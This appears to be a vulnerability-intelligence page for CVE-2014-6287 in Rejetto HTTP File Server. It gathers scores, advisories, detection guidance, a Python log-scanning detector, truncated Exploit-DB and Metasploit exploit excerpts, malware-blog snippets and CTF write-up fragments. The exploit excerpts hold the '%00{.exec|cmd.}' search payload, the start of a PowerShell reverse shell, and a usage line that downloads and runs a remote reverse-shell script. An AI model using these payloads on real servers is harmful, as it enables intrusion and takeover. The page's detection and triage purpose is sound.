CVE-2014-6287
Published: 2014-10-07
Priority: P196 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability (due 2022-04-15)
Exploited in the wild
EPSS: 99.32% (99.9th percentile)
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aka HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rejetto | http_file_server | >= 2.3 < 2.3c | 2.3c |
Detection & IOCs (extracted from sources)
- Hunt for mshta.exe spawned as a child of an HFS/web server process; this is the execution chain used by CVE-2014-6287 exploitation in BlackSquid
- Use Metasploit module exploit/windows/http/rejetto_hfs_exec to validate exposure; target is HttpFileServer httpd 2.3 on TCP/80
- Detect the null-byte search request pattern in HTTP traffic to HFS: look for GET requests to the HFS search endpoint containing '%00' in the query string
- CVE-2014-6287 only affects Rejetto HFS versions 2.3x before 2.3c; systems running 2.3c or later are not vulnerable
- BlackSquid employs anti-VM, anti-debug, and anti-sandbox checks before executing its exploit chain; detections in sandbox environments may not trigger the CVE-2014-6287 payload
- The hardware breakpoint evasion routine in BlackSquid is hard-coded at 0 (disabled) as of the analyzed sample, meaning this specific check may not be active in all variants
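One way to implement the null-byte search hunt over web access logs, as an added example that is not part of the original page or any vendor rule. It assumes Common Log Format lines from a proxy in front of HFS; the sample lines, addresses and reason labels are constructed. It goes slightly beyond the bullet by percent-decoding the `search` value before matching and by also flagging the macro markers from the findMacroMarker regex quoted on this page.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Common Log Format, documentation IPs).
# The second request is the pattern quoted in the advisory text on this page.
SAMPLE_LOG = """
192.0.2.10 - - [12/Mar/2024:10:01:02 +0000] "GET /?search=report HTTP/1.1" 200 4312
198.51.100.7 - - [12/Mar/2024:10:01:09 +0000] "GET /?search=%00{.exec|cmd.} HTTP/1.1" 200 512
203.0.113.4 - - [12/Mar/2024:10:02:30 +0000] "GET /?search={.exec|cmd.} HTTP/1.1" 200 4312
192.0.2.11 - - [12/Mar/2024:10:03:00 +0000] "GET /?sort=%00 HTTP/1.1" 200 4312
198.51.100.9 - - [12/Mar/2024:10:04:41 +0000] "GET /?search=%00%7B.exec%7Ccmd.%7D HTTP/1.1" 200 512
"""

# source address, method and request target from a Common Log Format line
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"'
)

# Macro open/close markers, taken from the findMacroMarker regex on this page.
# The bare '|' alternative is left out: it is too common in ordinary searches.
MACRO_RE = re.compile(r"\{[.:]|[.:]\}")


def classify_target(target):
    """Return sorted reason labels for one request target (empty list = clean)."""
    reasons = set()
    query = urlsplit(target).query
    # latin-1 maps every byte to one character, so a decoded %00 is kept as
    # '\x00' and percent-encoded braces are normalised before matching.
    for name, value in parse_qsl(query, keep_blank_values=True, encoding="latin-1"):
        if name.lower() != "search":
            continue
        if "\x00" in value:
            reasons.add("null-byte")
        if MACRO_RE.search(value):
            reasons.add("macro-marker")
    return sorted(reasons)


def scan(lines):
    """Return one finding dict per log line whose search parameter is suspicious."""
    findings = []
    for line in lines:
        match = LINE_RE.match(line)
        if not match:
            continue  # blank or unparseable line
        reasons = classify_target(match.group("target"))
        if reasons:
            findings.append({
                "src": match.group("src"),
                "method": match.group("method"),
                "target": match.group("target"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding["src"], ",".join(finding["reasons"]), finding["target"])
```

A line carrying both labels matches the request shape described for this CVE; a macro marker without the null byte is worth reviewing as probing, and any hit on a host running a version before 2.3c should be triaged together with the mshta.exe child-process hunt above.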
CVSS provenance
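| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | | 9.8 | CRITICAL | |
| cisa | | 9.8 | CRITICAL | |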
GHSA
GHSA-2hx5-63mq-crfj: The findMacroMarker function in parserLib
ghsa_unreviewed · 2022-05-13 · CRITICAL · CWE-94
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aka HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.
VulnCheck
Rejetto HTTP File Server (HFS) Remote Code Execution Vulnerability
vulncheck · 2014 · CVSS 9.8 · CRITICAL · CWE-94
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (HFS or HttpFileServer) allows remote attackers to execute arbitrary programs.
Affected: Rejetto HTTP File Server
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.trendmicro.com/en_us/research/19/f/blacksquid-slithers-into-servers-and-drives-with-8-notorious-exploits-to-drop-xmrig-miner.html; https://s.tencent.com/research/report/737.html; https://www.f5.com/labs/articles/threat-intelligence/vulnerabilities-exploits-and-malware-driving-attack-campaigns-in-november-2019; https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/; https://research.checkpoint.com/2020/rudeminer-b
CISA
Rejetto HTTP File Server (HFS) Remote Code Execution Vulnerability
cisa · 2022-03-25 · CVSS 9.8 · CRITICAL · CWE-94
Affected: Rejetto HTTP File Server (HFS)
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (HFS or HttpFileServer) allows remote attackers to execute arbitrary programs.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2014-6287
Remediation Due Date: 2022-04-15
No detection rules found.
Exploit-DB
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
exploitdb · 2021-02-23 · CVSS 9.8 · CRITICAL
---
# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 20/02/2021
# Exploit Author: Pergyz
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands
#!/usr/bin/python3
import base64
import os
import urllib.request
import urllib.parse
lhost = "10.10.10.1"
lport = 1111
rhost = "10.10.10.8"
rport = 80
# Define the command to be written to a file
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $clien
Exploit-DB
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
exploitdb · 2020-11-30 · CVSS 9.8 · CRITICAL
---
# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: Óscar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
#!/usr/bin/python3
# Usage : python3 Exploit.py
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
import urllib3
import sys
import urllib.parse
try:
http = urllib3.PoolManager()
url = f'http://{s
Exploit-DB
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
exploitdb · 2016-01-04 · CVSS 9.8 · CRITICAL
---
#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
# It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, ove
Exploit-DB
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)
exploitdb · 2014-10-09
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 "Rejetto HttpFileServer Remote Command Execution",
'Description' => %q{
Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a
poor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by
using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b
over Windows XP SP3, Windows 7 SP1 and Windows 8.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Daniele Linguaglossa ', # orginal discovery
'Muhamad Fadzil Ramli ' # metasploit module
],
'References' =>
[
['CVE',
Exploit-DB
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)
exploitdb · 2014-09-15 · CVSS 9.8 · CRITICAL
---
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
issue exists due to a poor regex in the file ParserLib.pas
function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
it will not handle null byte so a request to
http://localhost:80/?search=%00{.exec|cmd.}
will stop regex from parse macro , and macro will be executed and remote code injecti
Metasploit
Rejetto HttpFileServer Remote Command Execution
metasploit
Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows XP SP3, Windows 7 SP1 and Windows 8.
Nuclei
HTTP File Server <2.3c - Remote Command Execution
nuclei · CVSS 9.8 · CRITICAL
HTTP File Server =2.3c) to mitigate this vulnerability.
```yaml
reference:
  - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287
  - http://www.kb.cert.org/vuls/id/251276
  - http://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.html
  - https://github.com/rapid7/metasploit-framework/pull/3793
  - https://nvd.nist.gov/vuln/detail/CVE-2014-6287
classification:
  cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  cvss-score: 9.8
  cve-id: 'CVE-2014-6287'
  cwe-id: CWE-94
  epss-score: 0.94363
  epss-percentile: 0.99963
  cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:*
metadata:
  verified: true
  max-request: 1
  vendor: rejetto
  product: http_file_server
  shodan-query: http.favicon.hash:2124459909
  fofa-query: icon_hash=2124459909
tags: cve2014,cve,packetstorm,msf,hf
```
Checkpoint
Rudeminer, Blacksquid and Lucifer Walk Into A Bar
blogs_checkpoint · 2020-09-15 · CVSS 9.8 · CRITICAL · CVE-2018-10561
## Rudeminer, Blacksquid and Lucifer Walk Into A Bar
Research by David Driker, Amir Landau
Background
Lucifer is a Windows crypto miner and DDOS hybrid malware. Three months ago, researcher
Unit42
Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
blogs_unit42 · 2020-06-24 · CVSS 9.8 · CRITICAL
## Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
Ken Hsu
Durgesh Sangvikar
Zhibin Zhang
Chris Navarrete
Published: June 24, 2020
## Executive Summary
On May 29, 2020, Unit 42 researchers discovered a new variant of a hybrid cryptojacking malware from numerous incidents of CVE-2019-9081 exploitation in the wild. A closer look revealed the malware, which we’ve dubbed “Lucifer”, is capable of conducting DDoS attacks and well-equipped with all kinds of exploits against vulnerable Windows hosts. The first wave of the campaign stopped on June 10, 2020. The attacker then resumed their campaign on June 11, 2020, spreading an upgraded version of the malware and wreaking havoc. The sample was compiled on Thursday, June 11, 2020 10:39:47 PM UTC and caught by Palo Alto Networks Next-Generation Firewall. At the time of writing, the campaign’s still ongoing.
Lucifer is quite powerful in its capabilities. Not only is it capable
Trendmicro
BlackSquid Infects Servers and Drives, 8 Exploits Used
blogs_trendmicro · 2019-06-03 · CVSS 9.8 · CRITICAL
## BlackSquid Infects Servers and Drives, 8 Exploits Used
We found a new wormable malware we've named BlackSquid targeting web servers, network and removable drives using evasion, anti-virtualization, anti-debugging, and anti-sandboxing techniques to drop a Monero miner.
By: Johnlery Triunfante, Mark Vicente, Jay Nebre, Earle Maui Earnshaw | Jun 03, 2019
We updated this article on August 27, 2019 at 7:37 PM PST to include a co-author and amend the solution.
An unpatched security flaw that gets successfully exploited is one thing. But eight exploits that can stealthily and simultaneously get through your businesses’ assets and data and your customers’ information are quite another. We found a new malware family that targets web servers, ne
Greynoiseio
NoiseLetter June 2025
blogs_greynoiseio
CTF
EZ / optimum
ctf_writeups · CVSS 7.8 · HIGH
# recon
- nmap
```
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-method-tamper:
| VULNERABLE:
| Authentication bypass by HTTP verb tampering
| State: VULNERABLE (Exploitable)
| This web server contains password protected resources vulnerable to authentication bypass
| vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
| common HTTP methods and in misconfigured .htaccess files.
|
| Extra information:
|
| URIs suspected to be vulnerable to HTTP verb tampering:
| /~login [GEN
CTF
easy / README
ctf_writeups · CVSS 6.0 · MEDIUM
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
CTF
Optimum / README
ctf_writeups · CVSS 9.8 · CRITICAL
### IP
`10.10.10.8`
# Recon
### nmap
`nmap -sC -sV 10.10.10.8 -o Optimum.nmap`
```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-23 18:54 EST
Nmap scan report for 10.10.10.8
Host is up (0.051s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.78 seconds
```
* This looks very minimal... just port 80
* When we look on the website, we can see a link to [HttpFileServer 2.3](http://www.rejetto.com/hfs/), which takes us to Rejetto's website
# Exploitation
## 1. Manual
* When we
References
- http://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.html
- http://packetstormsecurity.com/files/135122/Rejetto-HTTP-File-Server-2.3.x-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/160264/Rejetto-HttpFileServer-2.3.x-Remote-Command-Execution.html
- http://packetstormsecurity.com/files/161503/HFS-HTTP-File-Server-2.3.x-Remote-Code-Execution.html
- http://www.kb.cert.org/vuls/id/251276
- https://github.com/rapid7/metasploit-framework/pull/3793
- https://www.exploit-db.com/exploits/39161/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2014-6287
Timeline
- 2014-10-07: Published
- 2022-03-25: Added to CISA KEV
- Exploited in the wild